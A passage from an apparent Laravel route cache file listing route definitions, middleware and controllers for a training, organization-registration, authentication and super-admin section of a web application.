'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'trainings/wizard',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@wizard',
'controller' => 'App\\Http\\Controllers\\TrainingController@wizard',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.wizard',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'trainings/create',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@create',
'controller' => 'App\\Http\\Controllers\\TrainingController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'trainings',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@store',
'controller' => 'App\\Http\\Controllers\\TrainingController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.show' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'trainings/{training}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@show',
'controller' => 'App\\Http\\Controllers\\TrainingController@show',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.show',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.edit' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'trainings/{training}/edit',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@edit',
'controller' => 'App\\Http\\Controllers\\TrainingController@edit',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.edit',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.update' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'trainings/{training}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@update',
'controller' => 'App\\Http\\Controllers\\TrainingController@update',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'trainings/{training}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@destroy',
'controller' => 'App\\Http\\Controllers\\TrainingController@destroy',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.instances.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'trainings/{training}/instances/create',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@createInstance',
'controller' => 'App\\Http\\Controllers\\TrainingController@createInstance',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.instances.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.instances.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'trainings/{training}/instances',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@storeInstance',
'controller' => 'App\\Http\\Controllers\\TrainingController@storeInstance',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.instances.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'trainings.instances.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'trainings/{training}/instances/{instance}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'capture.intended',
2 => 'auth',
3 => 'verified',
),
'uses' => 'App\\Http\\Controllers\\TrainingController@destroyInstance',
'controller' => 'App\\Http\\Controllers\\TrainingController@destroyInstance',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'trainings.instances.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'qualification.searchitem' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'ajax/search_item',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\JobController@searchItem',
'controller' => 'App\\Http\\Controllers\\JobController@searchItem',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'qualification.searchitem',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'terms.show' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'terms',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:22:"fn() => \\view(\'terms\')";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"00000000000002f40000000000000000";}}',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'terms.show',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'register.org' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'register/org',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\Auth\\OrgRegisterController@create',
'controller' => 'App\\Http\\Controllers\\Auth\\OrgRegisterController@create',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'register.org',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'register.org.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'register/org',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\Auth\\OrgRegisterController@store',
'controller' => 'App\\Http\\Controllers\\Auth\\OrgRegisterController@store',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'register.org.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'verification.notice' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'email/verify',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:29:"fn () => \\view(\'auth.verify\')";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"00000000000003170000000000000000";}}',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'verification.notice',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'verification.verify' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'email/verify/{id}/{hash}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'signed',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:185:"function (\\Illuminate\\Foundation\\Auth\\EmailVerificationRequest $request) {
$request->fulfill();
return \\redirect()->route(\'employer.jobs\')->with(\'success\', \'Email verified!\');
}";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"00000000000003190000000000000000";}}',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'verification.verify',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'verification.send' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'email/verification-notification',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'throttle:6,1',
),
'uses' => 'O:55:"Laravel\\SerializableClosure\\UnsignedSerializableClosure":1:{s:12:"serializable";O:46:"Laravel\\SerializableClosure\\Serializers\\Native":5:{s:3:"use";a:0:{}s:8:"function";s:169:"function (\\Illuminate\\Http\\Request $request) {
$request->user()->sendEmailVerificationNotification();
return \\back()->with(\'status\', \'verification-link-sent\');
}";s:5:"scope";s:37:"Illuminate\\Routing\\RouteFileRegistrar";s:4:"this";N;s:4:"self";s:32:"000000000000031b0000000000000000";}}',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'verification.send',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'login' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'login',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\Auth\\LoginController@showLoginForm',
'controller' => 'App\\Http\\Controllers\\Auth\\LoginController@showLoginForm',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'login',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'login.post' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'login',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\Auth\\LoginController@login',
'controller' => 'App\\Http\\Controllers\\Auth\\LoginController@login',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'login.post',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'logout' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'logout',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\Auth\\LoginController@logout',
'controller' => 'App\\Http\\Controllers\\Auth\\LoginController@logout',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'logout',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.request' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'password/reset',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\Auth\\ForgotPasswordController@showLinkRequestForm',
'controller' => 'App\\Http\\Controllers\\Auth\\ForgotPasswordController@showLinkRequestForm',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.request',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.email' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'password/email',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\Auth\\ForgotPasswordController@sendResetLinkEmail',
'controller' => 'App\\Http\\Controllers\\Auth\\ForgotPasswordController@sendResetLinkEmail',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.email',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.reset' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'password/reset/{token}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\Auth\\ResetPasswordController@showResetForm',
'controller' => 'App\\Http\\Controllers\\Auth\\ResetPasswordController@showResetForm',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.reset',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'password.update' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'password/reset',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
),
'uses' => 'App\\Http\\Controllers\\Auth\\ResetPasswordController@reset',
'controller' => 'App\\Http\\Controllers\\Auth\\ResetPasswordController@reset',
'namespace' => NULL,
'prefix' => '',
'where' =>
array (
),
'as' => 'password.update',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.dashboard' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@index',
'controller' => 'App\\Http\\Controllers\\AdminController@index',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.dashboard',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.organizations.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/organizations/create',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@createOrganization',
'controller' => 'App\\Http\\Controllers\\AdminController@createOrganization',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.organizations.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.organizations.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/organizations',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@storeOrganization',
'controller' => 'App\\Http\\Controllers\\AdminController@storeOrganization',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.organizations.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.organizations.delete' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'admin/organizations/{organization}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@deleteOrganization',
'controller' => 'App\\Http\\Controllers\\AdminController@deleteOrganization',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.organizations.delete',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.organizations.review' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/organizations/{organization}/review',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@reviewOrganization',
'controller' => 'App\\Http\\Controllers\\AdminController@reviewOrganization',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.organizations.review',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.organizations.show' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/organizations/{organization}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@show',
'controller' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@show',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.organizations.show',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.organizations.update-badgau' =>
array (
'methods' =>
array (
0 => 'PUT',
),
'uri' => 'admin/organizations/{organization}/badgau',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@updateBadgau',
'controller' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@updateBadgau',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.organizations.update-badgau',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.organizations.create-album' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/organizations/{organization}/albums',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@createAlbum',
'controller' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@createAlbum',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.organizations.create-album',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.organizations.act-as' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/organizations/{organization}/act-as',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@actAs',
'controller' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@actAs',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.organizations.act-as',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.organizations.exit-act-as' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/organizations/exit-act-as',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@exitActAs',
'controller' => 'App\\Http\\Controllers\\Admin\\AdminOrganizationController@exitActAs',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.organizations.exit-act-as',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.users.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/users/create',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@createUser',
'controller' => 'App\\Http\\Controllers\\AdminController@createUser',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.users.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.users.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/users',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@storeUser',
'controller' => 'App\\Http\\Controllers\\AdminController@storeUser',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.users.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.users.delete' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'admin/users/{user}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@deleteUser',
'controller' => 'App\\Http\\Controllers\\AdminController@deleteUser',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.users.delete',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.invitations.resend' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/invitations/{invitation}/resend',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@resendInvitation',
'controller' => 'App\\Http\\Controllers\\AdminController@resendInvitation',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.invitations.resend',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.invitations.cancel' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'admin/invitations/{invitation}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@cancelInvitation',
'controller' => 'App\\Http\\Controllers\\AdminController@cancelInvitation',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.invitations.cancel',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.jobs.delete' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'admin/jobs/{job}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\AdminController@deleteJob',
'controller' => 'App\\Http\\Controllers\\AdminController@deleteJob',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.jobs.delete',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.credential-mappings.index' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/credential-mappings',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\CredentialMappingController@index',
'controller' => 'App\\Http\\Controllers\\Admin\\CredentialMappingController@index',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.credential-mappings.index',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.credential-mappings.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/credential-mappings/create',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\CredentialMappingController@create',
'controller' => 'App\\Http\\Controllers\\Admin\\CredentialMappingController@create',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.credential-mappings.create',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.credential-mappings.store' =>
array (
'methods' =>
array (
0 => 'POST',
),
'uri' => 'admin/credential-mappings',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\CredentialMappingController@store',
'controller' => 'App\\Http\\Controllers\\Admin\\CredentialMappingController@store',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.credential-mappings.store',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.credential-mappings.destroy' =>
array (
'methods' =>
array (
0 => 'DELETE',
),
'uri' => 'admin/credential-mappings/{mapping}',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\CredentialMappingController@destroy',
'controller' => 'App\\Http\\Controllers\\Admin\\CredentialMappingController@destroy',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.credential-mappings.destroy',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.index' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/badge-albums',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@index',
'controller' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@index',
'namespace' => NULL,
'prefix' => '/admin',
'where' =>
array (
),
'as' => 'admin.badge-albums.index',
),
'fallback' => false,
'defaults' =>
array (
),
'wheres' =>
array (
),
'bindingFields' =>
array (
),
'lockSeconds' => NULL,
'waitSeconds' => NULL,
'withTrashed' => false,
),
'admin.badge-albums.create' =>
array (
'methods' =>
array (
0 => 'GET',
1 => 'HEAD',
),
'uri' => 'admin/badge-albums/create',
'action' =>
array (
'middleware' =>
array (
0 => 'web',
1 => 'auth',
2 => 'super.admin',
),
'uses' => 'App\\Http\\Controllers\\Admin\\BadgeAlbumController@create',
